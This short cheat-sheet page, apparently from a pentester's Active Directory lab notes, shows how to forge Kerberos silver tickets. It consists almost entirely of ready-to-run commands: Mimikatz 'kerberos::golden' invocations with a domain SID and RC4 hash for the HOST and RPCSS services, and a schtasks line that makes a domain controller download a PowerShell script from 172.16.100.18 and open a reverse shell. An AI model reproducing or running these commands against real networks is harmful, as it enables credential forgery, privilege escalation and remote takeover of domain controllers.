Create Silver Ticket

Property
Links

Creates a Kerberos ticket for the administrator and service of choosing; In the below, uses Powercat and Invoke-PowerShellTcp to get a reverse shell

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "User518" /TR "powershell.exe -c 'iex (iwr http://172.16.100.18:8181/Invoke-PowerShellTcp.ps1 -UseBasicParsing);Power -Reverse -IPAddress 172.16.100.18 -Port 443'"

To create a Silver Ticket on the WMI service, need to create a Kerberos ticket for HOST and PRCSS services

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:RPCSS /rc4:f77f286dfe833929525cf79b4e1b7c14 /ptt"'
TwitterLinkedInMediumDiscord

Copyright © Joe Helle 2023